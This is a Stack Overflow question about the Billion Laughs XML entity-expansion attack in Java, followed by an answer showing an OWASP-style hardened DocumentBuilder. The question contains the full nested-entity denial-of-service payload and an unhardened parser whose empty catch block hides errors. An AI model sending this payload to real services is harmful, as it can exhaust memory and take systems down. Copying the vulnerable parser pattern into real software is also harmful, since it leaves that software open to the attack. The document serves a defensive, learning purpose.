How can I reproduce and prevent the Billion Laughs attack in Java?

江枫思渺然 submitted on 2021-02-18 12:18:28

Question


After a bit of research here's a code sample I've come up with that I think should be vulnerable to the Billion Laughs attack. However, it doesn't seem to be working: "Done." is printed to the console much too quickly (instantly from a human's point of view).

import java.io.StringReader;

import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;

import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.xml.sax.InputSource;

public class BillionLOLs {

    public static void vuln(String xml) {

        try{
            DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
            DocumentBuilder builder = factory.newDocumentBuilder();
            Document doc = builder.parse(new InputSource(new StringReader(xml)));
            Element root = doc.getDocumentElement();
        } catch (Exception e){
            // Empty catch: every exception the parser throws is discarded unseen.
        }
    }

    public static void main(String[] args){

        String xml = 
                "<?xml version=\"1.0\"?>"
                + "<!DOCTYPE lolz ["
                + "<!ENTITY lol \"lol\">"
                + "<!ENTITY lol2 \"&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;\">"
                + "<!ENTITY lol3 \"&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;\">"
                + "<!ENTITY lol4 \"&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;\">"
                + "<!ENTITY lol5 \"&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;\">"
                + "<!ENTITY lol6 \"&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;\">"
                + "<!ENTITY lol7 \"&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;\">"
                + "<!ENTITY lol8 \"&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;\">"
                + "<!ENTITY lol9 \"&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;\">"
                + "]>"
                + "<lolz>&lol9;</lolz>";

        vuln(xml);
        System.out.println("Done.");

    }
}

I've read the OWASP cheat sheet on how to fix this issue in Java, and I assume those methods are still up to date and no other clever attacks have been discovered in the meantime that would make OWASP's guidance irrelevant.

My specific questions are: why doesn't my code take longer to execute, like I expect it to, and if Java is vulnerable to the Billion Laughs attack, how can I prevent it?

The command java -version gives the following output.

java version "1.7.0_75"
Java(TM) SE Runtime Environment (build 1.7.0_75-b13)
Java HotSpot(TM) Client VM (build 24.75-b04, mixed mode, sharing)

Source: https://stackoverflow.com/questions/46282711/how-can-i-reproduce-and-prevent-the-billion-laughs-attack-in-java
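Two things stand out in the question's code: the empty catch block discards anything the parser throws, so a rejected document and a successfully parsed one both reach "Done.", and the factory is left at its defaults. The following is an added example, not code from the question or from the OWASP cheat sheet itself: a DocumentBuilder configured the way the cheat sheet recommends, with the parser's exception surfaced instead of swallowed. The class name, method names and the shortened two-level sample input are my own.

```java
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;

public class HardenedXmlParser {
    // Constructed input: a two-level version of the question's entity pyramid.
    // The DOCTYPE itself is what the hardened parser rejects, whatever the depth.
    static final String XML_WITH_DOCTYPE =
            "<?xml version=\"1.0\"?>"
            + "<!DOCTYPE lolz [<!ENTITY lol \"lol\">"
            + "<!ENTITY lol2 \"&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;\">]>"
            + "<lolz>&lol2;</lolz>";

    // DocumentBuilder configured as the OWASP XXE cheat sheet recommends.
    static DocumentBuilder hardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        // Primary defence: refuse any DOCTYPE, so no entities can be declared at all.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth for parser implementations that ignore the feature above.
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f.newDocumentBuilder();
    }

    // Returns the root element name, or null when the parser rejected the input.
    static String parseRootName(String xml) {
        try {
            Document doc = hardenedBuilder().parse(new InputSource(new StringReader(xml)));
            return doc.getDocumentElement().getTagName();
        } catch (SAXParseException e) {
            // Do not swallow this: it is the parser reporting that the input was refused.
            System.err.println("Rejected: " + e.getMessage());
            return null;
        } catch (Exception e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        System.out.println(parseRootName(XML_WITH_DOCTYPE));
        System.out.println(parseRootName("<ok>plain document</ok>"));
    }
}
```

With the DOCTYPE refused up front, the entity declarations are never read, so expansion cost never enters the picture; a document without a DOCTYPE parses normally.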
